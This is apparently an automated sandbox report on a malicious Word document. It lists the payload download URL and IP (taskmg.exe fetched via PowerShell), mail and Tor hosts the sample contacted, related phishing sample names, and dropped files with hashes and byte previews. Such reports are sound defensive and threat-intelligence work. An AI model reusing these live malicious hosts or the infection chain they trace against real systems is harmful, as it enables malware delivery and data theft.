                    https://api.ipify.org%0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    http://servername/isapibackend.dll0%Avira URL Cloudsafe
                    httP://173.232.204.89/taskmg.exePE0%Avira URL Cloudsafe
                    http://java.cohe0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    us2.smtp.mailhostbox.com
                    		208.91.199.224
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://173.232.204.89/taskmg.exetrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://java.co_wpowershell.exe, 00000005.00000002.418277171.000000000019E000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://DynDns.comDynDNStaskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      httP://173.232.2powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      		low
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000003.00000002.424369467.0000000002510000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.418546129.0000000002210000.00000002.00020000.sdmp, taskmg.exe, 00000009.00000002.447397125.00000000057A0000.00000002.00020000.sdmpfalse
                        		high
                        httP://173.232.204.89/taskmg.powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://EW9kaPSTVWDzFNsliGsC.org(Zgttaskmg.exe, 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hataskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        httP://173.232.204.89/tpowershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://173.232.204.89powershell.exe, 00000003.00000002.430015540.0000000003749000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        httP://173.232.204.89/taskmg.exepowershell.exe, 00000005.00000002.418266539.0000000000160000.00000004.00000020.sdmp, powershell.exe, 00000005.00000002.418277171.000000000019E000.00000004.00000020.sdmp, powershell.exe, 00000005.00000002.419023647.0000000002C91000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.418378144.00000000004A4000.00000004.00000040.sdmptrue
                          		unknown
                          http://EW9kaPSTVWDzFNsliGsC.orgtaskmg.exe, 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.ipify.org%GETMozilla/5.0taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		low
                          http://www.%s.comPApowershell.exe, 00000003.00000002.424369467.0000000002510000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.418546129.0000000002210000.00000002.00020000.sdmp, taskmg.exe, 00000009.00000002.447397125.00000000057A0000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          		low
                          httP://173.232powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          		low
                          http://www.piriform.com/ccleanervpowershell.exe, 00000003.00000002.423981506.000000000043E000.00000004.00000020.sdmpfalse
                            		high
                            http://GwvXXB.comtaskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametaskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpfalse
                              		high
                              https://api.ipify.org%taskmg.exe, 0000000E.00000002.705002661.00000000027F0000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		low
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziptaskmg.exe, 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, taskmg.exe, 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://servername/isapibackend.dllschtasks.exe, 0000000C.00000002.437567787.0000000000740000.00000002.00020000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              httP://173.232.204.89/taskmg.exePEpowershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://java.cohepowershell.exe, 00000003.00000002.423981506.000000000043E000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              208.91.198.143
                              		unknownUnited States
                              		394695PUBLIC-DOMAIN-REGISTRYUStrue
                              208.91.199.225
                              		unknownUnited States
                              		394695PUBLIC-DOMAIN-REGISTRYUStrue
                              208.91.199.223
                              		unknownUnited States
                              		394695PUBLIC-DOMAIN-REGISTRYUStrue
                              208.91.199.224
                              		us2.smtp.mailhostbox.comUnited States
                              		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                              173.232.204.89
                              		unknownUnited States
                              		62904EONIX-COMMUNICATIONS-ASBLOCK-62904UStrue

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:528737
                              Start date:25.11.2021
                              Start time:18:14:04
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 10m 52s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:Reconfirm The Details.doc
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:19
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winDOC@21/27@9/5
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 90%
                              • Number of executed functions: 87
                              • Number of non-executed functions: 4
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .doc
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Active ActiveX Object
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateFile calls found.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              18:14:21API Interceptor107x Sleep call for process: powershell.exe modified
                              18:14:27API Interceptor1096x Sleep call for process: taskmg.exe modified
                              18:14:33API Interceptor1x Sleep call for process: schtasks.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              208.91.198.143Document.exeGet hashmaliciousBrowse
                                MT_101_SWIFT.docGet hashmaliciousBrowse
                                  Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                    TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                      E invoice.exeGet hashmaliciousBrowse
                                        UY2021 Ta-Ho Maritime Schedule.exeGet hashmaliciousBrowse
                                          PNkBekAKOeQD1Jj.exeGet hashmaliciousBrowse
                                            PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                              DHL Documentos de envio originales.exeGet hashmaliciousBrowse
                                                XSsBxQH419.exeGet hashmaliciousBrowse
                                                  devis.xlsxGet hashmaliciousBrowse
                                                    Quotation- 306013SQ.exeGet hashmaliciousBrowse
                                                      PO 4601056018.exeGet hashmaliciousBrowse
                                                        Purchase Order Vale-60,000MT.exeGet hashmaliciousBrowse
                                                          BOQ 11745692.exeGet hashmaliciousBrowse
                                                            dhl_doc9548255382.exeGet hashmaliciousBrowse
                                                              ADYP_210913_100641_PAGOS_005539.xlsxGet hashmaliciousBrowse
                                                                Quotation.xlsxGet hashmaliciousBrowse
                                                                  Advice Payment Copy.exeGet hashmaliciousBrowse
                                                                    IMG-20211110-OWA001.exeGet hashmaliciousBrowse
                                                                      208.91.199.225Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                        P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                          STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                            XsFFv27rls.exeGet hashmaliciousBrowse
                                                                              TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                E invoice.exeGet hashmaliciousBrowse
                                                                                  Bill of lading.exeGet hashmaliciousBrowse
                                                                                    devis.xlsxGet hashmaliciousBrowse
                                                                                      dhl_doc9548255382.exeGet hashmaliciousBrowse
                                                                                        PO 4601056018.exeGet hashmaliciousBrowse
                                                                                          ADYP_210913_100641_PAGOS_005539.xlsxGet hashmaliciousBrowse
                                                                                            Quotation.xlsxGet hashmaliciousBrowse
                                                                                              Purchase Order 20000MT.exeGet hashmaliciousBrowse
                                                                                                Invoice- Shping DOCX.exeGet hashmaliciousBrowse
                                                                                                  Invoice No ANT19-20646.exeGet hashmaliciousBrowse
                                                                                                    8rwaRyxu9W9IUfB.exeGet hashmaliciousBrowse
                                                                                                      RZB0ljZiQMqYfAw.exeGet hashmaliciousBrowse
                                                                                                        Shipment Details.exeGet hashmaliciousBrowse
                                                                                                          urgent order 1065.exeGet hashmaliciousBrowse
                                                                                                            NEW PURCHASE ORDER LIST NOV2021.exeGet hashmaliciousBrowse

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              us2.smtp.mailhostbox.comDocument.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.198.143
                                                                                                              MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              DOC221121.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              Swift_HSBC_0099087645 xOJ4XUjdMZ40k5Hpdf.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              rTyPU1zmY5PsyNl.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.198.143
                                                                                                              STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TransactionSummary_22-11-2021.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.198.143
                                                                                                              E invoice.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.198.143
                                                                                                              TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              (KOREA SHIPPING - KLCSM).exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              Bill of lading.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              UY2021 Ta-Ho Maritime Schedule.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              AWB Number 0004318855.DOCX.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224

                                                                                                              ASN

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              PUBLIC-DOMAIN-REGISTRYUSDocument.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              Swift Copy TT.docGet hashmaliciousBrowse
                                                                                                              • 207.174.212.140
                                                                                                              MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              DOC221121.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                              • 103.50.163.110
                                                                                                              Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.198.143
                                                                                                              STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                                              • 199.79.62.99
                                                                                                              E invoice.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              TOwYernH3DhfPER.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.181
                                                                                                              Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                              • 103.50.163.110
                                                                                                              Bill of lading.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              UY2021 Ta-Ho Maritime Schedule.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              PUBLIC-DOMAIN-REGISTRYUSDocument.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              Swift Copy TT.docGet hashmaliciousBrowse
                                                                                                              • 207.174.212.140
                                                                                                              MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              DOC221121.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                              • 103.50.163.110
                                                                                                              Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.198.143
                                                                                                              STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                                              • 199.79.62.99
                                                                                                              E invoice.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              TOwYernH3DhfPER.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.181
                                                                                                              Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                              • 103.50.163.110
                                                                                                              Bill of lading.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              UY2021 Ta-Ho Maritime Schedule.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223

                                                                                                              JA3 Fingerprints

                                                                                                              No context

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exe
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):777216
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              MD5:815982590DE5E574ABB8A0310826E200
                                                                                                              SHA1:6C41343A2E25F932F901E53E615CC083209F6A65
                                                                                                              SHA-256:56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
                                                                                                              SHA-512:4C343183EC50C6887B758ED1FA40478BC87A0944792944D42C9978EBDA94B08A9D2E3E77B039963BF0A3EC2D5090BBB7FBA9CF0486EBE8C00AC393A2361FCE98
                                                                                                              Malicious:true
                                                                                                              Reputation:low
                                                                                                              IE Cache URL:http://173.232.204.89/taskmg.exe
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@.................................\...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........H...!..........Lj................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3263CED7.png
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:370 sysV pure executable
                                                                                                              Category:dropped
                                                                                                              Size (bytes):262160
                                                                                                              Entropy (8bit):0.0018490830516166626
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:j//VqllXWkjd0d8lltFIlfylvxtlPLl:j//g8od0mlXuu
                                                                                                              MD5:768311D8560A7B68F932635AFBB0BE29
                                                                                                              SHA1:2682A89B637FA735C3AEA5775BCEAC01DFA279D6
                                                                                                              SHA-256:B85834248C00C5651F339C9C062EEAF649859E815E1A6E4116E2B80F025DAE44
                                                                                                              SHA-512:A6843C4612C60D4D0FC3BA6E7C3104C64A725E14ABC8AD41C6A4875A2AEE8C3A1091B6B60BF7FC2199A6368733AFEF92C713EA710171441AC29731E61432E3EF
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview: X.C......{^.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\867A2AEC.wmf
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3712
                                                                                                              Entropy (8bit):5.038125428163887
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:wk7Hgwj+mbYf3LSrhlOs0f5aSdHn63Dx3:wk7Awam8fI4s0f5ap3
                                                                                                              MD5:A471EB10EDF79F5E92490204E5B3C016
                                                                                                              SHA1:094EB944A7BE50A54FF8E215207A5B2D24D7408E
                                                                                                              SHA-256:96065A620C5F15B1A8BC2291D5D241832AAFB187475AD45576C10BAA689619FD
                                                                                                              SHA-512:0B432B8D56C81B9F52A92C2977AE34DE5EFA1B73D01B10DB9B72701D7D16BCB9ABE05760A095253A3FA4DA7A57E588C88C7CC15700308BFF9CFFBEE2A11CAA15
                                                                                                              Malicious:false
                                                                                                              Preview: ......@.....!.....................5...........................Segoe UI....C.-.....@..........s....-...........................A..... . ..... . ...:.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...:.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):214016
                                                                                                              Entropy (8bit):4.757365759711338
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:5Eabzacasapa2H/Na7yTAEabzacasapa2H/Na7pKv:Xbzacasapa2HY7hbzacasapa2HY7
                                                                                                              MD5:EC345C74FAF6F653C35C60E305D8914E
                                                                                                              SHA1:466F1FF61AD7D611B31932A4D861330B88535B9C
                                                                                                              SHA-256:7B6862C9A303B229AEC0C3D8F45F7291447F4FDD0ADE59513E8E8278B2BB87F6
                                                                                                              SHA-512:A563D3AA6EEDFD3B4BED6C372C0B4A4055D71F75D2A5B54CA796AF2CFE6E65744939C0539D43F0ECE6600A570ADE3F4E44710E1DF3EF6CAD437E76B121EB759D
                                                                                                              Malicious:false
                                                                                                              Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4DFB1A07-CB4F-472F-B236-A3BF6A79B957}.tmp
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):44098
                                                                                                              Entropy (8bit):2.8795771285294594
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:dT/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:5Fia0Dqeb0nstw29rVzWSgm58F
                                                                                                              MD5:0639D028278A2669A3D479D75A5ED861
                                                                                                              SHA1:437C61B35B9C7FFBD4C4B41B0BBAE84E228FA1F9
                                                                                                              SHA-256:360C3B6069F9DFE479ADFEF7893BFA0AEDB86A4239E117DFAA33EA4919EC17CB
                                                                                                              SHA-512:C03E435B6FD4B9348642FA05985199C60E0684CFB5FB2BA71928F414E12BEA15A5AF88FD70C3B9052D2F6E0E3E97FE381E0A9DA4E144C3C4424410F3AA2A524B
                                                                                                              Malicious:false
                                                                                                              Preview: c.0.5.=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.e.g.h.D.p.~...S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K.........................................................................................................................................................................................................................................................H...R...X............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j.PJe...CJ..OJ..QJ..U..^J..aJ.
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6B5678D1-0902-45B5-A7D8-811025AE74F7}.tmp
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1024
                                                                                                              Entropy (8bit):0.05390218305374581
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                              Malicious:false
                                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C8C94021-4E02-4955-8AF8-3AD414138F04}.tmp
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1536
                                                                                                              Entropy (8bit):1.3554734412254814
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbG:IiiiiiiiiifdLloZQc8++lsJe1MzLl/
                                                                                                              MD5:64E043ACB99A5A7A6BEDF8B83BEA3CF6
                                                                                                              SHA1:BD260E7730F22912CEB711384253D9820AF96EB4
                                                                                                              SHA-256:47E5EE0092D08DEF032FD11BF38DD8EE9827BC1809BA6722C439A24EA6634FE7
                                                                                                              SHA-512:626F3FCD72C8AE3DF333D56EFD4CB631ED849F395ED5771CB8DA4F67938D94693EF798E33857700B8CE7EDBAF6C9C74CC05BD20ACADC06D5E2B4F4571E6131C2
                                                                                                              Malicious:false
                                                                                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):97522
                                                                                                              Entropy (8bit):4.490013837211777
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:VEabzacasapa2lGWOlARldNVYwUn7ZwPW1ir:VEabzacasapa2H/Na7M
                                                                                                              MD5:330B9EB7A9C4CA0E21376FC14CCD2CAD
                                                                                                              SHA1:B42ADF2B6AAAE3AD3BC2CC02E4CACD7A1F47F520
                                                                                                              SHA-256:002B90B761DC216BCA8DB9DCED5F3E6802C9BB672CDFA9045FBECC40C5C128F8
                                                                                                              SHA-512:6208CE1A1B4129BEBCE827463B223DAFF88650C26E989E84A7B34E562CB54571AE204BF6A991C5DFA7B6F65EEF77CB83478885B1B793CBA2A337DE17CAA10CD2
                                                                                                              Malicious:true
                                                                                                              Preview: .............................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:gAWY3n:qY3n
